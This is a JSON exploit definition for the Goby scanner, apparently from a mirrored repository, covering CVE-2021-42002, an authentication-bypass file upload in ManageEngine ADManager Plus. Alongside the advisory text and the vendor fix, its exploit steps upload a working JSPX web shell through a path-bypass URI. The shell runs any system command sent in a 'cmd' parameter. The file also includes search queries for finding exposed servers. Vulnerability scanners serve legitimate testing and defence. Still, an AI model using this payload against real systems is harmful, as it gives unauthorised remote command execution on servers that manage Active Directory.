qwqdanchun
/
Goby
mirror of https://github.com/qwqdanchun/Goby.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity
Goby/json/ManageEngine-ADManager-Plus...

222 lines
10 KiB
JSON
Raw Normal View History

auto
2022-11-25 02:08:58 -08:00
{
"Name": "ManageEngine ADManager Plus File upload vulnerability(CVE-2021-42002)",
"Description": "<p><span style=\"color: rgb(68, 68, 68);\"><span style=\"color: rgb(22, 51, 102); font-size: 16px;\">ManageEngine ADManager Plus is&nbsp;</span>An Active Directory (AD) management and reporting solution that allows IT administrators and technicians to manage AD objects easily and generate instant reports at the click of a button!<br></span></p><p><span style=\"color: rgb(68, 68, 68); font-size: medium;\">ManageEngine ADManager Plus &lt;7114 Filter bypass leading to file-upload remote code execution,this&nbsp;<span style=\"color: rgb(54, 71, 79);\">vulnerability has been fixed and released in version&nbsp;</span><strong style=\"color: rgb(54, 71, 79);\">7115</strong></span><br></p>",
"Product": "ManageEngine ADManager Plus",
"Homepage": "https://www.manageengine.com/",
"DisclosureDate": "2021-11-11",
"Author": "Flip_FI",
"FofaQuery": "app=\"ManageEngine-ADManager-Plus\" || title=\"ManageEngine - ADManager Plus\"",
"GobyQuery": "app=\"ManageEngine-ADManager-Plus\" || title=\"ManageEngine - ADManager Plus\"",
"Level": "3",
"Impact": "<p>The attacker can bypass the permission and directly upload the Trojan horse jspx file, and can remotely execute any system command to obtain the server permission, which is a great risk<br></p>",
"Recommendation": "<p><span style=\"color: var(--primaryFont-color);\">The vendor has released a bug fix, please pay attention to the update in time:<span style=\"color: rgb(22, 51, 102); font-size: 16px;\"><a href=\"https://www.manageengine.com/products/ad-manager/release-notes.html#7115\">https://www.manageengine.com/products/ad-manager/release-notes.html#7115</a></span></span><br></p>",
"References": [
"https://www.manageengine.com/products/ad-manager/release-notes.html#7115"
],
"Is0day": false,
"HasExp": true,
"ExpParams": [
{
"name": "cmd",
"type": "input",
"value": "whoami",
"show": ""
}
],
"ExpTips": {
"Type": "",
"Content": ""
},
"ScanSteps": [
"AND",
{
"Request": {
"method": "POST",
"uri": "/;AAA/MobileAPI/WC/PasswordExpiryNotification?operation=fileAttachment",
"follow_redirect": false,
"header": {
"Content-Type": "multipart/form-data; boundary=---------------------------18496892720832008743187564073"
},
"data_type": "text",
"data": "-----------------------------18496892720832008743187564073\nContent-Disposition: form-data; name=\"UPLOADED_FILE\"; filename=\"1.jspx\"\r\nContent-Type: text/plain\r\n\r\n<jsp:root xmlns:jsp=\"http://java.sun.com/JSP/Page\" xmlns=\"http://www.w3.org/1999/xhtml\" xmlns:c=\"http://java.sun.com/jsp/jstl/core\" version=\"2.0\">\n<jsp:directive.page contentType=\"text/html;charset=UTF-8\" pageEncoding=\"UTF-8\"/>\n<jsp:directive.page import=\"java.util.*\"/>\n<jsp:directive.page import=\"java.io.*\"/>\n<jsp:scriptlet><![CDATA[\n\tout.println(\"c4ca4238a0b923820dcc509a6f75849b\");\n\t]]></jsp:scriptlet>\n</jsp:root>\r\n-----------------------------18496892720832008743187564073--"
},
"ResponseTest": {
"type": "group",
"operation": "AND",
"checks": [
{
"type": "item",
"variable": "$code",
"operation": "==",
"value": "200",
"bz": ""
},
{
"type": "item",
"variable": "$body",
"operation": "contains",
"value": "SUCCESS",
"bz": ""
}
]
},
"SetVariable": [
"file|lastbody|regex|([0-9_.a-z]+.jspx)"
]
},
{
"Request": {
"method": "GET",
"uri": "/ompemberapp/PasswordExpiryNotification/{{{file}}}",
"follow_redirect": true,
"header": {},
"data_type": "text",
"data": ""
},
"ResponseTest": {
"type": "group",
"operation": "AND",
"checks": [
{
"type": "item",
"variable": "$code",
"operation": "==",
"value": "200",
"bz": ""
},
{
"type": "item",
"variable": "$body",
"operation": "contains",
"value": "c4ca4238a0b923820dcc509a6f75849b",
"bz": ""
}
]
},
"SetVariable": []
}
],
"ExploitSteps": [
"AND",
{
"Request": {
"method": "POST",
"uri": "/;AAA/MobileAPI/WC/PasswordExpiryNotification?operation=fileAttachment",
"follow_redirect": true,
"header": {
"Content-Type": "multipart/form-data; boundary=---------------------------18496892720832008743187564073"
},
"data_type": "text",
"data": "-----------------------------18496892720832008743187564073\nContent-Disposition: form-data; name=\"UPLOADED_FILE\"; filename=\"1.jspx\"\r\nContent-Type: text/plain\r\n\r\n<jsp:root xmlns:jsp=\"http://java.sun.com/JSP/Page\" xmlns=\"http://www.w3.org/1999/xhtml\" xmlns:c=\"http://java.sun.com/jsp/jstl/core\" version=\"2.0\">\n<jsp:directive.page contentType=\"text/html;charset=UTF-8\" pageEncoding=\"UTF-8\"/>\n<jsp:directive.page import=\"java.util.*\"/>\n<jsp:directive.page import=\"java.io.*\"/>\n<jsp:scriptlet><![CDATA[\n\tString cmd = pageContext.getRequest().getParameter(\"cmd\");\n\tif (cmd != null&&!\"\".equals(cmd)) {\n\ttry{\n\t\tProcess p = Runtime.getRuntime().exec(cmd);\n\t\tInputStream in = p.getInputStream();\n\t\tBufferedReader br = new BufferedReader(new InputStreamReader(in,\"GBK\"));\n\t\tString brs = br.readLine();\n\t\twhile(brs!=null){\n\t\t\tout.println(brs+\"</br>\");\n\t\t\tbrs = br.readLine();\n\t\t}\n\t\t}catch(Exception ex){\n\t\t\tout.println(ex.toString());\n\t\t}\n\t}]]></jsp:scriptlet>\n</jsp:root>\r\n-----------------------------18496892720832008743187564073--"
},
"ResponseTest": {
"type": "group",
"operation": "AND",
"checks": [
{
"type": "item",
"variable": "$code",
"operation": "==",
"value": "200",
"bz": ""
},
{
"type": "item",
"variable": "$body",
"operation": "contains",
"value": "SUCCESS",
"bz": ""
}
]
},
"SetVariable": [
"file|lastbody|regex|([0-9_.a-z]+.jspx)"
]
},
{
"Request": {
"method": "POST",
"uri": "/ompemberapp/PasswordExpiryNotification/{{{file}}}",
"follow_redirect": true,
"header": {
"Content-Type": "application/x-www-form-urlencoded"
},
"data_type": "text",
"data": "cmd={{{cmd}}}"
},
"ResponseTest": {
"type": "group",
"operation": "AND",
"checks": [
{
"type": "item",
"variable": "$code",
"operation": "==",
"value": "200",
"bz": ""
}
]
},
"SetVariable": [
"output|lastbody|regex|([\\w\\W]+)"
]
}
],
"Tags": [
"Code Execution",
"File Upload"
],
"VulType": [
"Code Execution",
"File Upload"
],
"CVEIDs": [
"CVE-2021-42002"
],
"CNNVD": [
"CNNVD-202111-1073"
],
"CNVD": [
"CNVD-2021-88234 "
],
"CVSSScore": "9.8",
"Translation": {
"CN": {
"Name": "ManageEngine ADManager Plus 任意文件上传漏洞(CVE-2021-42002)",
"Product": "ManageEngine ADManager Plus",
"Description": "<p><span style=\"color: rgb(22, 51, 102); font-size: 16px;\">ManageEngine ADManager Plus 是Zoho公司开发的</span>一个 Active Directory (AD) 管理和报告解决方案,它允许 IT 管理员和技术人员轻松管理 AD 对象并单击按钮生成即时报告!</p><p><span style=\"color: var(--primaryFont-color);\">ManageEngine ADManager Plus &lt;= 7114 存在权限绕过漏洞导致未授权用户允许上传JSPX文件至网站目录达到任意代码执行目的。</span></p>",
"Recommendation": "<p><span style=\"color: var(--primaryFont-color);\">厂商已发布了漏洞修复程序,请及时关注更新:<a href=\"https://www.manageengine.com/products/ad-manager/release-notes.html#7115\">https://www.manageengine.com/products/ad-manager/release-notes.html#7115</a></span><br></p>",
"Impact": "<p><span style=\"font-size: medium;\"><span style=\"color: rgb(22, 51, 102);\">攻击者通过权限绕过直接上传木马jspx文件可远程执行任意系统命令获取服务器权限风险极大</span></span></p>",
"VulType": [
"代码执⾏",
"⽂件上传"
],
"Tags": [
"代码执⾏",
"⽂件上传"
]
},
"EN": {
"Name": "ManageEngine ADManager Plus File upload vulnerability(CVE-2021-42002)",
"Product": "ManageEngine ADManager Plus",
"Description": "<p><span style=\"color: rgb(68, 68, 68);\"><span style=\"color: rgb(22, 51, 102); font-size: 16px;\">ManageEngine ADManager Plus is&nbsp;</span>An Active Directory (AD) management and reporting solution that allows IT administrators and technicians to manage AD objects easily and generate instant reports at the click of a button!<br></span></p><p><span style=\"color: rgb(68, 68, 68); font-size: medium;\">ManageEngine ADManager Plus &lt;7114 Filter bypass leading to file-upload remote code execution,this&nbsp;<span style=\"color: rgb(54, 71, 79);\">vulnerability has been fixed and released in version&nbsp;</span><strong style=\"color: rgb(54, 71, 79);\">7115</strong></span><br></p>",
"Recommendation": "<p><span style=\"color: var(--primaryFont-color);\">The vendor has released a bug fix, please pay attention to the update in time:<span style=\"color: rgb(22, 51, 102); font-size: 16px;\"><a href=\"https://www.manageengine.com/products/ad-manager/release-notes.html#7115\">https://www.manageengine.com/products/ad-manager/release-notes.html#7115</a></span></span><br></p>",
"Impact": "<p>The attacker can bypass the permission and directly upload the Trojan horse jspx file, and can remotely execute any system command to obtain the server permission, which is a great risk<br></p>",
"VulType": [
"Code Execution",
"File Upload"
],
"Tags": [
"Code Execution",
"File Upload"
]
}
},
"AttackSurfaces": {
"Application": null,
"Support": null,
"Service": null,
"System": null,
"Hardware": null
}
}